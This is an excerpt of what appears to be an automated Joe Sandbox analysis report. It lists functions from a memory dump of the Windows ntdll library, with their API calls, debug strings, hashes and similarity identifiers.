Instruction ID: 92f7354ea580491181341e1c2e6bffc7a14b0a5dd717bd5c41dab6a9d508d54f
Opcode Fuzzy Hash: 9a14311423cc82ffbd2f46de2d28a6018941a859dee6411bc2e50fb863234309
Instruction Fuzzy Hash: 4041A0B1A00219CBDB15CF5CC44079EB7B6AF84704F66519BE892AB3C4DF71D902CB54

Uniqueness

Uniqueness Score: -1.00%

Function 7266A0BE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

bsearch.210A(?,?,?,0000001C,Function_0002A820,00000018,C0150008,?), ref: 7266A137
RtlCompareMemory.210A(?,00000018,00000010,00000018,C0150008,?), ref: 726B110A
RtlCompareMemory.210A(?,00000018,00000010,00000018,C0150008,?), ref: 726B1134

Strings

GsHd, xrefs: 7266A0E3

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CompareMemory$bsearch
String ID: GsHd
API String ID: 2403757825-55511517
Opcode ID: ba6686c23822333668fafd6cd2d6c287997e1520561259535d33299b216871ea
Instruction ID: ce948f68823752d366d7d2189f0f4f70c7b3f7aab883b165f0ca199a04610f90
Opcode Fuzzy Hash: ba6686c23822333668fafd6cd2d6c287997e1520561259535d33299b216871ea
Instruction Fuzzy Hash: 2C4180B1A00609DFCB15CF5CC980A9AF7F6FF49308B24856AE406AB381D771ED55CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 7265E238, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105COMMON

Download Yara Rule

Strings

Status: 0x%08lx, xrefs: 726AC754
LdrpFindLoadedDllInternal, xrefs: 726AC75B
minkernel\ntdll\ldrfind.c, xrefs: 726AC765

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Section$CloseExclusiveLockView$AcquireCreateEqualFileHeaderImageOpenReleaseStringUnicodeUnmap
String ID: LdrpFindLoadedDllInternal$Status: 0x%08lx$minkernel\ntdll\ldrfind.c
API String ID: 3490744819-1275355888
Opcode ID: 5eb998236c0426d09cf655fc1a63e966d47e9bed942111647b6ef14056f393fb
Instruction ID: 88ffefa613c492faf9df7c80af579fa9becb40f2239bcc97a6e03421eb843f83
Opcode Fuzzy Hash: 5eb998236c0426d09cf655fc1a63e966d47e9bed942111647b6ef14056f393fb
Instruction Fuzzy Hash: C9414F7590026C9BDB26CB29CC81BDABBB9AB09350F0045D7E949A6184DB709F90CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 726417D0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?,7271ECB8,00000018), ref: 726417F7
RtlGetIntegerAtom.210A(?,?,?,7271ECB8,00000018), ref: 72641813

Part of subcall function 7264189D: _wcsicmp.210A(0000001C,?,?,?,00000000,?,?,?,?), ref: 72641941

RtlReleaseSRWLockExclusive.210A(?,?,?,?,7271ECB8,00000018), ref: 7264187D

Part of subcall function 726419A6: RtlIsValidIndexHandle.210A(?,?,00000000,?,?,72641412,7271EC78,00000044), ref: 726419B5

Strings

Atom, xrefs: 726417E7

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireAtomHandleIndexIntegerReleaseValid_wcsicmp
String ID: Atom
API String ID: 2453091922-2154973765
Opcode ID: 166bb7d97e28039fe830540639be4ebebf0c83bf93b28768f9606b46db74db6d
Instruction ID: 0e6de18575bba3d3791c7cb35001ec18a1fd044a371e065047b883478d4289d9
Opcode Fuzzy Hash: 166bb7d97e28039fe830540639be4ebebf0c83bf93b28768f9606b46db74db6d
Instruction Fuzzy Hash: 8D319FB5E00215CFDB05DF9CC840AEEB779BF48254F16619BD991A72C0DF349A01C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 726D4345, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 72683158: memset.210A(00000000,00000000,72692500,?,00000001,00000000,?,72648D40,00000000,?,?,00000030,?,?,00000001,?), ref: 72683198

DbgPrintEx.210A(00000033,00000000,SXS: %s() found activation context data at %p with wrong format,RtlpQueryRunLevel,?,?,00000030,?,00000030,?,?,00000001,?,?), ref: 726D43D1

Strings

SXS: %s() found activation context data at %p with assembly roster that has no root, xrefs: 726D43C9
SXS: %s() found activation context data at %p with wrong format, xrefs: 726D43F3
RtlpQueryRunLevel, xrefs: 726D43C4, 726D43EE

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Printmemset
String ID: RtlpQueryRunLevel$SXS: %s() found activation context data at %p with assembly roster that has no root$SXS: %s() found activation context data at %p with wrong format
API String ID: 4188176266-4139752556
Opcode ID: ea37a2780c905c5fa5e6ab53cd1d73c311a4aa17840e9030eb6199e6a3432f05
Instruction ID: 65b988b238efb40a0932f3c4cc66a8fc0ce974ebb821cf6aebc8f424367f02ec
Opcode Fuzzy Hash: ea37a2780c905c5fa5e6ab53cd1d73c311a4aa17840e9030eb6199e6a3432f05
Instruction Fuzzy Hash: 282123B26043199FD716CE0DDC81E0BB7ADEBC4218F02469BF8468B286DA30ED41C791

Uniqueness

Uniqueness Score: -1.00%

Function 7264A520, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

RtlIpv4AddressToStringW.210A(?,?), ref: 7264A55A

Part of subcall function 7264A5B0: ___swprintf_l.LIBCMT(?,00000010,%u.%u.%u.%u,?,?,?,?,?,?,7264A55F,?,?), ref: 7264A5D7

memcpy.210A(?,?,?,?,?), ref: 7264A581
___swprintf_l.LIBCMT(00000000,?,:%u,?,?,?), ref: 726A5048

Strings

:%u, xrefs: 726A503F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ___swprintf_l$AddressIpv4Stringmemcpy
String ID: :%u
API String ID: 3942147149-505539584
Opcode ID: f58d098c2132e3103eafaf172422dabbdf29b1870dcb78d725a8b183942d8a03
Instruction ID: 706d11bfb063fd299f21365dade9ec2eab373c58fcbbe62ce896c0dd582abf33
Opcode Fuzzy Hash: f58d098c2132e3103eafaf172422dabbdf29b1870dcb78d725a8b183942d8a03
Instruction Fuzzy Hash: 8811AB71A11119ABD705DE6DD951AAF77B9EF44310B50011BF886D7180EF30EE15C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 7270327C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.210A(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,72720910), ref: 727032B3

Strings

RtlGetUserInfoHeap, xrefs: 727032CA, 72703327

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: DebugPrintTimes
String ID: RtlGetUserInfoHeap
API String ID: 3446177414-1656697243
Opcode ID: e2413663ee1c4e128072e4ade0aaada785cda082bd94096e50c395fc5512974c
Instruction ID: d9cc8fc15589b5de5662148a4d25afc39aada07585c23d3c4be3eef42169f1fa
Opcode Fuzzy Hash: e2413663ee1c4e128072e4ade0aaada785cda082bd94096e50c395fc5512974c
Instruction Fuzzy Hash: 3D21A130900299EBDF22CFACCB447AEFFB1BF55314F04854AE4856B192CB724A59CB94

Uniqueness

Uniqueness Score: -1.00%

Function 7266A490, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

DbgPrintEx.210A(00000033,00000000,SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.,RtlpFindActivationContextSection_CheckParameters,C000000D,?,00000000,?,?,72669EB4,00000018,?,?), ref: 726B13D7

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 726B13BA
RtlpFindActivationContextSection_CheckParameters, xrefs: 726B13B5, 726B13C7
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 726B13CC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3558298466-2454235068
Opcode ID: eb1c219393d782f6d2877461823fef381dd0919867b683d1b8483a7b1abc4562
Instruction ID: a87a3c5cc9eef2d3f65739e9d89b59b3a19aa3241247485adcaa92a36d22e320
Opcode Fuzzy Hash: eb1c219393d782f6d2877461823fef381dd0919867b683d1b8483a7b1abc4562
Instruction Fuzzy Hash: A6014970B04226ABFB1A851CCC49F3933AA6FC0219F1442ABED07DBDC6DA25CC808790

Uniqueness

Uniqueness Score: -1.00%

Function 7265515D, Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

RtlCreateAcl.210A(?,?,00000002,?,?,00000000,?,?,?,00000000,?,?,?,?,000000C8,?), ref: 7265519F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e740243caaf84b1183676f6d282baea3a8b868d56d649c37410dde2ddd335ecb
Instruction ID: 18bbbd8c408b938f3f71721c5785379f8393fdf879dfb11c5b175c8346b7c705
Opcode Fuzzy Hash: e740243caaf84b1183676f6d282baea3a8b868d56d649c37410dde2ddd335ecb
Instruction Fuzzy Hash: C4A1C231905289AFDF02CFAEC844BEE7FB5AF49304F14805BF946A7288E3759A45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 72641200, Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

iswctype.210A(0000000A,00000004), ref: 72641264
iswctype.210A(00000000,00000004), ref: 7269F9DA

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: iswctype
String ID:
API String ID: 304682654-0
Opcode ID: 0ba8339f7f1042ffb85ca883934d92f589e081254019a4503ae90dcdd4ce16c6
Instruction ID: 58a420adc90f1c75469530d09e8dbf730f3ff6ab04eb780fc9d6936d62a2c537
Opcode Fuzzy Hash: 0ba8339f7f1042ffb85ca883934d92f589e081254019a4503ae90dcdd4ce16c6
Instruction Fuzzy Hash: 9E71D6B1F0011A8BDB19CEADC5907BE77F2AB85354F20655BD8C2E72C4DE349A81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 726DC7F3, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

RtlEqualSid.210A(?,?,-00000008,?,00000000,?,?,?,?,?,?,?,?,?,726A91AC,00000000), ref: 726DC93A
RtlInitializeSid.210A(?,?,00000001,?,?,-00000008,?,00000000), ref: 726DC986
RtlEqualPrefixSid.210A(?,?,?,?,00000001,?,?,-00000008,?,00000000), ref: 726DC99E
RtlEqualSid.210A(?,00000000,?,?,?,?,00000001,?,?,-00000008,?,00000000), ref: 726DC9D8

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Equal$InitializePrefix
String ID:
API String ID: 3132320312-0
Opcode ID: e747d905759358c8f35fbc3c92d49b6018d5985d978f95eecab0a03ade070922
Instruction ID: 0526cc60f1542a2b1cd116c56a3e9b78722e375a26a5a5c1129fbbf1e5838eae
Opcode Fuzzy Hash: e747d905759358c8f35fbc3c92d49b6018d5985d978f95eecab0a03ade070922
Instruction Fuzzy Hash: DE619372E4011D9BDF15CF5CC880EA9BBB6BF45218F14856AE857EB285DB35E802CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 727153B2, Relevance: 6.1, APIs: 4, Instructions: 146COMMON

Download Yara Rule

APIs

RtlFreeUnicodeString.210A(?,00000000,00000074,?,?,?), ref: 72715520
RtlNtStatusToDosError.210A(00000000,00000074,?,?,?), ref: 72715551

Part of subcall function 7264CC90: DbgPrint.210A(RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?,?,?,-00000F38,00000000,?,?), ref: 726A5B5C
Part of subcall function 7264CC90: DbgPrint.210A(RTL: Edit ntos\rtl\generr.c to correct the problem,?,?,?,-00000F38,00000000,?,?), ref: 726A5B66
Part of subcall function 7264CC90: DbgPrint.210A(RTL: ERROR_MR_MID_NOT_FOUND is being returned,?,-00000F38,00000000,?,?), ref: 726A5B73

RtlFreeUnicodeString.210A(00000074,00000000,00000074,?,?,?), ref: 72715560

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$FreeStringUnicode$ErrorStatus
String ID:
API String ID: 2838936234-0
Opcode ID: 30dd28a51d8ac3c56da36b09ce0b3e1f9bfee851d6f0390e9588b7d6faf7096f
Instruction ID: 669d4915da92eb9b5921e99221e7f615920e0e579d23c7bf3d700ad356691e4d
Opcode Fuzzy Hash: 30dd28a51d8ac3c56da36b09ce0b3e1f9bfee851d6f0390e9588b7d6faf7096f
Instruction Fuzzy Hash: F6517071A006179BCB1DCF6DC681B9ABBB6BF88304F548179DD0AAB345E730E951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7271E742, Relevance: 6.1, APIs: 4, Instructions: 110timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(72738684,72738668,?,?,72738668,72738668,?,7271DFE4,?,80000002,72738668,72738660), ref: 7271E799
RtlReleaseSRWLockExclusive.210A(72738684,72738684,72738668,?,?,72738668,72738668,?,7271DFE4,?,80000002,72738668,72738660), ref: 7271E832
RtlDebugPrintTimes.210A(?,?,72738684,72738684,72738668,?,?,72738668,72738668,?,7271DFE4,?,80000002,72738668,72738660), ref: 7271E840
RtlReleaseSRWLockExclusive.210A(72738684,72738684,72738668,?,?,72738668,72738668,?,7271DFE4,?,80000002,72738668,72738660), ref: 7271E84B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$Release$AcquireDebugPrintTimes
String ID:
API String ID: 309489879-0
Opcode ID: 49caf8ffeb826321d39a9d1c20bb0fc5e985e5380c3a60fd217999729c69ea31
Instruction ID: 47a17499f6594d624b34c1bfd8ee3cc0ba115eb3991950ad8c0c800c04d4c507
Opcode Fuzzy Hash: 49caf8ffeb826321d39a9d1c20bb0fc5e985e5380c3a60fd217999729c69ea31
Instruction Fuzzy Hash: 9531C336A004269FDB09CF1DC991669B7B5EFC932031882ADE916DB395DB34ED41CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 7266C4B0, Relevance: 6.1, APIs: 4, Instructions: 103timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(?,00000000,00000000), ref: 7266C4FC
RtlReleaseSRWLockExclusive.210A(?,00000000,00000000,?,00000000,00000000), ref: 7266C560
TpSetWaitEx.210A ref: 726B1DB5
RtlDebugPrintTimes.210A(?,?,00000000,00000000,?,00000000,00000000), ref: 726B1E06

Part of subcall function 7266EF90: ZwAssociateWaitCompletionPacket.210A(?,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000,00000000), ref: 7266EFC8

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLockWait$AcquireAssociateCompletionDebugPacketPrintReleaseTimes
String ID:
API String ID: 1549838691-0
Opcode ID: 446afe843c28ac19430c22ce0d48998897292c3f908bf7f92c73c8cb450217c6
Instruction ID: 33575a33abaa9ffdc5c71026a32a42565fe843a37adb5e7d1007b18c689bcd4d
Opcode Fuzzy Hash: 446afe843c28ac19430c22ce0d48998897292c3f908bf7f92c73c8cb450217c6
Instruction Fuzzy Hash: 05317071600B57AFC705CF7DC9447AABBA5BF88710F154A2AE86687280DB34E825CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 7265915E, Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

RtlValidSid.210A(?,?,00000000,?), ref: 72659171
RtlValidAcl.210A(?,?,?,00000000,?), ref: 726591AF
RtlFirstFreeAce.210A(?,?,?,?,?,00000000,?), ref: 726591BD
memmove.210A(?,?,?,?,?,?,?,?,00000000,?), ref: 72659216

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Valid$FirstFreememmove
String ID:
API String ID: 2152316407-0
Opcode ID: 4f62d37e34a990931fb2cd78239a65ebbe81c7e090623a1e489db4a1c69e9081
Instruction ID: 349659e354e14fe222fc1c954a66928f08fe3354adfae3177befbb15b7e21bdd
Opcode Fuzzy Hash: 4f62d37e34a990931fb2cd78239a65ebbe81c7e090623a1e489db4a1c69e9081
Instruction Fuzzy Hash: 16319821614245AFCB018BAFD8507EABBB59F0A220F048247E9C5CB2C1F638DA85C3D1

Uniqueness

Uniqueness Score: -1.00%

Function 72687771, Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(727386AC,?,00000078,00000000,00000000,?,72713B95,?,00000000,00000000), ref: 72687786
RtlTryAcquireSRWLockShared.210A(?,727386AC,?,00000078,00000000,00000000,?,72713B95,?,00000000,00000000), ref: 726877AF
RtlReleaseSRWLockExclusive.210A(727386AC,727386AC,?,00000078,00000000,00000000,?,72713B95,?,00000000,00000000), ref: 726877C3
RtlReleaseSRWLockShared.210A(00000028,727386AC,727386AC,?,00000078,00000000,00000000,?,72713B95,?,00000000,00000000), ref: 726877D0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Lock$AcquireExclusiveReleaseShared
String ID:
API String ID: 3474408661-0
Opcode ID: 37d78a741cc5c78197ff4000dfef1521e476c860179d446a7b8ee2745a8c3ec5
Instruction ID: e2313ba4731f41a25c543e63cb6ebdf9f009b516c76d24b68e9fb845f4cc5d7d
Opcode Fuzzy Hash: 37d78a741cc5c78197ff4000dfef1521e476c860179d446a7b8ee2745a8c3ec5
Instruction Fuzzy Hash: 4021F53EA016159BDB17CA1DCA00926B3F5AF8466471402AFDC57EB7D5DB31EC81C780

Uniqueness

Uniqueness Score: -1.00%

Function 7264C7D0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

memset.210A(?,00000000,-00000008,?,?), ref: 7264C80A
A_SHAUpdate.210A(00000001,00000080,00000000,00000002,?,?), ref: 7264C842
memset.210A(00000001,00000000,00000040,00000005,00000001,00000080,00000000,00000002,?,?), ref: 7264C859
A_SHAInit.210A(00000001,00000080,00000000,00000002,?,?), ref: 7264C862

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: memset$InitUpdate
String ID:
API String ID: 3464590283-0
Opcode ID: 0a6e8375aad1cf5716ea08b7d3422d300a23c7209f967d2a7c8b3c3f8ba89b5c
Instruction ID: b9772025755276c2a7b3d4e7db4c42197385ad1b1cab357a48d0b0c7a0e86e87
Opcode Fuzzy Hash: 0a6e8375aad1cf5716ea08b7d3422d300a23c7209f967d2a7c8b3c3f8ba89b5c
Instruction Fuzzy Hash: 52117876E0024CABD710DFADCC81BDEBB68EB45700F00052AE6559B2C4DB75A919C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 726D26FB, Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockShared.210A(?,00000000,00000000,00000008,?,?,726A0D42,00000000,?,00000000,00000000,00000000,00001030,000000FF,?,00000000), ref: 726D2714
RtlAcquireSRWLockShared.210A(0000000C,?,00000000,00000000,00000008,?,?,726A0D42,00000000,?,00000000,00000000,00000000,00001030,000000FF,?), ref: 726D272C

Part of subcall function 7266B500: RtlDllShutdownInProgress.210A(00000000), ref: 7266B565
Part of subcall function 7266B500: ZwWaitForAlertByThreadId.210A(?,00000000,?,?,?,?,?,?,?,00000000), ref: 7266B613

RtlReleaseSRWLockShared.210A(0000000C,0000000C,?,00000000,00000000,00000008,?,?,726A0D42,00000000,?), ref: 726D275A
RtlReleaseSRWLockShared.210A(?,?,00000000,00000000,00000008,?,?,726A0D42,00000000,?,00000000,00000000,00000000,00001030,000000FF,?), ref: 726D2785

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: LockShared$AcquireRelease$AlertProgressShutdownThreadWait
String ID:
API String ID: 276812241-0
Opcode ID: 304c9e6747c34ce39146dc7af4965738561f57daa0c20d521c20cccb5325d325
Instruction ID: f81073e47e38784590b503b8ad58e8fcc71f06c4090361aec0d1f2b7656aa995
Opcode Fuzzy Hash: 304c9e6747c34ce39146dc7af4965738561f57daa0c20d521c20cccb5325d325
Instruction Fuzzy Hash: ED11917250020EEBCB30CE59C580A66B7FEEB84328B14885FD54A93682D731EC46C750

Uniqueness

Uniqueness Score: -1.00%

Function 7266A387, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

memset.210A(00000000,00000000,00000050,00000000,727352D8,00000000,?,7269DA06,?,00000000,00000000,?), ref: 7266A39B

Strings

DLL search path passed in externally: %ws, xrefs: 7269EF87
LdrpInitializeDllPath, xrefs: 7269EF8E
minkernel\ntdll\ldrutil.c, xrefs: 7269EF98

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
